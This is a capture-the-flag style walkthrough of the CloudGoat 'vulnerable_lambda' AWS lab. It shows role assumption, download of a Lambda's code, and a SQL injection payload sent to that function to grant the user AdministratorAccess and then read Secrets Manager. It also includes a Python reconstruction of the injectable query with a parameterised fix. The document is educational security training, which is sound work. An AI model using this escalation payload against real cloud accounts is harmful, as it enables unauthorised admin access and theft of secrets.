CloudGoat: vulnerable_lambda

0xLeeBai
4 min read · May 7, 2024


Note:

  • We will be performing the attack from Kali Linux
  • Ensure you have completed the prerequisites (CloudGoat installed and an AWS profile that can deploy the scenario configured) before you start the lab

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_lambda

1.2 Read the start.txt file

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_lambda*

┌──(root㉿kali)-[/opt/cloudgoat/vul...]
└─# cat start.txt

Access Key ID = AAAABBBBCCCCDDDD
Access Secret Key = 111122223333

1.3 Create profile for bilbo user

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile bilbo

AWS Access Key ID: AAAABBBBCCCCDDDD
AWS Secret Access Key: 111122223333
Default region name:
Default output format:

2. Enumeration

2.1 whoami

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws sts get-caller-identity --profile bilbo --region us-east-1

{
"UserId": "...",
"Account": "...",
"Arn": "arn:aws:iam::1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6"
}
  • arn = arn:aws:iam::1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6 (IAM ARNs carry no region, hence the empty field before the account ID)
  • username = cg-bilbo-vulnerable-lambda-cgidxqb9uign6 (the part after "user/")

2.2: list the inline policies on the bilbo user

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam list-user-policies --user-name cg-bilbo-vulnerable-lambda-cgidxqb9uign6 --profile bilbo --region us-east-1

{
"PolicyNames": ["cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer"]
}
  • list-user-policies returns only inline policies; managed policies attached to the user would show up under list-attached-user-policies instead, so check both when enumerating

2.3: show the details of the policy

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-user-policy --user-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6 --policy-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer --profile bilbo --region us-east-1

{
... ... ...
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Resource": "arn:aws:iam::yyy:role/cg-lambda-invoker*",
"Sid": ""
}
... ... ...
}
  • bilbo may assume any role in the account whose name starts with cg-lambda-invoker; the trailing wildcard is what we enumerate against next

2.4: list the roles in your account, filter by CloudGoat (ie, start with “cg-”)

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-roles | grep cg-

... ... ...
"RoleName": "cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
"Arn": "arn:aws:iam::yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
... ... ...

2.5: list the policies for that role

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-role-policies --role-name cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6

{
"PolicyNames": ["lambda-invoker"]
}
  • this is an inline policy on the role; its document (readable with iam get-role-policy) is what lets the role list and invoke Lambda functions, which is what we do in section 3

3. Exploitation

3.1: assume the role

  • FYI: assuming a role returns a set of temporary security credentials (an access key ID, a secret access key and a session token) that let us act as that role and reach resources bilbo cannot touch directly
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 sts assume-role --role-arn arn:aws:iam::yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6 --role-session-name cloudgoat-session1

{
"Credentials": {
"AccessKeyId": "AAA123123",
"SecretAccessKey": "BBB123123",
"SessionToken": "CCC123123",
... ... ...
}
}
  • we got the credentials for the CloudGoat role that can invoke the lambda
  • let’s create a new profile based on these credentials

3.2: create new profile for the temporary credentials

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile vulnlambda

AWS Access Key ID: AAA123123
AWS Secret Access Key: BBB123123
Default region name:
Default output format:
  • aws configure only prompts for the access key ID and secret access key; it never asks for the session token
  • temporary STS credentials are rejected without it (the CLI reports InvalidClientTokenId), so add aws_session_token to the profile by hand in the credentials file; the credentials also expire (one hour by default), after which you must re-run assume-role and update the profile again
┌──(root㉿kali)-[/opt/cloudgoat]
└─# mousepad /root/.aws/credentials
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat /root/.aws/credentials

[...]
... ... ...
[bilbo]
aws_access_key_id = AAAABBBBCCCCDDDD
aws_secret_access_key = 111122223333
[vulnlambda]
aws_access_key_id = AAA123123
aws_secret_access_key = BBB123123
aws_session_token = CCC123123
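Editing the credentials file by hand is where the session token gets forgotten. The script below is an added example for this write-up (it is not part of CloudGoat or the AWS CLI): it reads the JSON that assume-role prints, writes all three fields into a named profile with the file kept at mode 0600, and refuses credentials that are already past their Expiration. SAMPLE_ASSUME_ROLE_OUTPUT is a constructed stand-in for the real response with placeholder values; the script name make_profile.py in the usage comment is assumed.

```python
"""Turn the JSON that `aws sts assume-role` prints into a usable CLI profile.

Added example for this write-up, not part of CloudGoat or the AWS CLI.
SAMPLE_ASSUME_ROLE_OUTPUT is a constructed sample; every value is fake.
"""
import configparser
import io
import json
import os
import sys
from datetime import datetime, timezone

# Constructed sample of an assume-role response (placeholder values).
SAMPLE_ASSUME_ROLE_OUTPUT = json.dumps({
    "Credentials": {
        "AccessKeyId": "AAA123123",
        "SecretAccessKey": "BBB123123",
        "SessionToken": "CCC123123",
        "Expiration": "2099-01-01T00:00:00+00:00",
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROAEXAMPLEID:cloudgoat-session1",
        "Arn": "arn:aws:sts::123456789012:assumed-role/cg-lambda-invoker-example/cloudgoat-session1",
    },
})


def parse_assume_role(output: str) -> dict:
    """Map the Credentials block onto the keys the credentials file expects."""
    c = json.loads(output)["Credentials"]
    return {
        "aws_access_key_id": c["AccessKeyId"],
        "aws_secret_access_key": c["SecretAccessKey"],
        # `aws configure` never prompts for this one, but STS keys are useless without it.
        "aws_session_token": c["SessionToken"],
        "expiration": c.get("Expiration", ""),
    }


def is_expired(creds: dict, now: datetime = None) -> bool:
    """True once the temporary credentials are past their Expiration timestamp."""
    exp = creds.get("expiration")
    if not exp:
        return False
    now = now or datetime.now(timezone.utc)
    return now >= datetime.fromisoformat(exp)


def render_profile(existing_ini: str, profile: str, creds: dict) -> str:
    """Return the credentials file text with `profile` added or replaced."""
    cp = configparser.ConfigParser()
    cp.read_string(existing_ini)
    cp[profile] = {k: v for k, v in creds.items() if k.startswith("aws_")}
    buf = io.StringIO()
    cp.write(buf)
    return buf.getvalue()


def write_profile(path: str, profile: str, creds: dict) -> None:
    """Rewrite the credentials file at `path` with `profile` set, keeping mode 0600."""
    existing = ""
    if os.path.exists(path):
        with open(path) as f:
            existing = f.read()
    text = render_profile(existing, profile, creds)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(text)


if __name__ == "__main__":
    # Usage: aws sts assume-role ... | python3 make_profile.py vulnlambda
    # With nothing piped in it just renders the constructed sample.
    raw = SAMPLE_ASSUME_ROLE_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    creds = parse_assume_role(raw)
    if is_expired(creds):
        sys.exit("credentials already expired; re-run assume-role")
    if len(sys.argv) > 1:
        write_profile(os.path.expanduser("~/.aws/credentials"), sys.argv[1], creds)
    else:
        print(render_profile("", "vulnlambda", creds))
```

Because the profile is rewritten from the parsed JSON rather than typed in, the token cannot be left out, and the existing [bilbo] section survives untouched.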

3.3: list the lambda functions

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda list-functions

{
"Functions": [
{
"FunctionName": "vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1",
... ... ...
}
]
}

3.4: Return details of that function

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda get-function --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1

{
"Configuration": {
...
},
"Code": {
"RepositoryType": "S3",
"Location": "https://xxxyyyzzz"
},
...
}
  • the Location field is a pre-signed S3 URL for the function's deployment package
  • opening that URL downloads a zip file
  • unzip it; among the source files inside is main.py
  • note line 15 of main.py, where AdministratorAccess is flagged false: the function is meant to refuse that policy, but it decides this with a SQL query built from the caller-supplied policy name, which is what the next step abuses

3.5: send SQLi payload to the lambda function

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda invoke --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1 --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "cg-bilbo-vulnerable-lambda-cgidxqb9uign6"}' out.txt

{
"StatusCode": 200,
... ... ...
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat out.txt

"All managed policies were applied as expected."
  • the single quote in the payload closes the string literal the function wraps around the policy name, and "--" comments out the rest of the query, including the check that the policy is allowed, so the lookup returns AdministratorAccess and the function attaches it to bilbo
  • bilbo is now an admin; confirm with iam list-attached-user-policies on the bilbo user before moving on
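To see exactly why the payload works, here is the lookup reconstructed in Python, vulnerable form beside the fix. This is an added example for this write-up, modelled on the behaviour described above (caller-supplied policy names checked against a local table in which AdministratorAccess is marked not public); it is not a copy of CloudGoat's main.py, and the table layout, column names and the stubbed apply step are assumptions.

```python
"""The policy-applier injection, reconstructed: vulnerable lookup beside the fix.

Added example for this write-up, not CloudGoat's main.py. The policies
table, its columns and the stand-in handler are assumptions; the apply
step records what would be attached instead of calling IAM.
"""
import sqlite3

# The policy_names entry sent in step 3.5.
PAYLOAD = "AdministratorAccess' --"


def build_db() -> sqlite3.Connection:
    """Constructed allow-list table: only policies marked public may be attached."""
    db = sqlite3.connect(":memory:")
    db.execute("create table policies (policy_name text, public text)")
    db.executemany(
        "insert into policies values (?, ?)",
        [
            ("AmazonSNSReadOnlyAccess", "True"),
            ("IAMReadOnlyAccess", "True"),
            ("AdministratorAccess", "False"),  # the 'false' flag the write-up points at
        ],
    )
    return db


def lookup_vulnerable(db: sqlite3.Connection, policy_name: str) -> list:
    """String-formatted query. A quote in the input ends the literal early and
    `--` comments out the rest of the line, including the public='True' check."""
    sql = (
        f"select policy_name from policies "
        f"where policy_name='{policy_name}' and public='True'"
    )
    return [row[0] for row in db.execute(sql)]


def lookup_fixed(db: sqlite3.Connection, policy_name: str) -> list:
    """Parameterised query: the name is bound as data, so quotes and `--` are inert."""
    sql = "select policy_name from policies where policy_name=? and public='True'"
    return [row[0] for row in db.execute(sql, (policy_name,))]


def handler(event: dict, lookup=lookup_vulnerable) -> dict:
    """Stand-in for the Lambda entry point: attach every policy the lookup approves."""
    db = build_db()
    attached = []
    for name in event["policy_names"]:
        attached.extend(lookup(db, name))
    # The real function would call iam.attach_user_policy for each entry here.
    return {
        "user_name": event["user_name"],
        "attached": attached,
        "body": "All managed policies were applied as expected.",
    }


if __name__ == "__main__":
    event = {"policy_names": [PAYLOAD], "user_name": "cg-bilbo-example"}
    print("vulnerable:", handler(event)["attached"])
    print("fixed:     ", handler(event, lookup_fixed)["attached"])
```

With the vulnerable lookup the query that actually runs is select policy_name from policies where policy_name='AdministratorAccess' --' and public='True', so the public check is dead text and AdministratorAccess comes back; with the bound parameter the same payload matches nothing, while a legitimate public policy name still works.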

3.6: list the secrets in secretsmanager

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager list-secrets

{
"SecretList": [
{
"Arn": "arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz",
... ... ...
... ... ...
}
]
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz

{
... ... ...
... ... ...
}

4. Clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_lambda

Destroy "xxx" ? [y/n]: y
  • once the scenario is gone, also remove the bilbo and vulnlambda profiles from /root/.aws/credentials


Written by 0xLeeBai

Moonlight before my bed; I take it for frost on the ground. I lift my head to gaze at the bright moon, then lower it and think of home.
